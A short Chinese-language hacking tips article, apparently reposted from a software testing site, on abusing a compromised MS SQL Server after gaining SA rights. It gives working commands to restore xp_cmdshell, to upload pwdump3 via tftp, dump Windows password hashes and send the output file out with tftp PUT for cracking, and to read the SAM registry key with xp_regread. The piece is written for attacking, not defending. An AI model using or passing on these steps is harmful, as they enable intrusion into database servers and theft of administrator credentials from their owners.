解决数据库的问题和技巧:
1、获得SA权限后,却不能执行xp_cmdshell存储过程怎么办?
答:可能是已经把xp_cmdshell等扩展存储过程删除了,可以用这个存储过程把xp_cmdshell恢复sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’。
2、通过数据库用pwdump获得系统管理员密码:
先上传一个pwdump:
tftp -i GET pwdump3.exe pwdump3.exe
tftp -i GET lsaext.dll lsaext.dll
tftp -i GET pwservice.exe pwservice.exe
pwdump3 127.0.0.1 outfile.txt
tftp PUT outfile.txt outfile.txt
然后再用解密工具l0pht等等破解这些密码。
3、从数据库读取系统管理员密码:
能读出加密的密码是NT的“administrator”账号也不能做的,SQL Server能读出来是使用的“LocalSystem”账号,这个账号比administrator更高一级。可以使用下面这个存储过程。不过读出来的密码是经过加密后的,然后再解密:
xp_regread ’HKEY_LOCAL_MACHINE’,’SECURITY\SAM\Domains\Account’,’F’
文章来源于领测软件测试网 https://www.ltesting.net/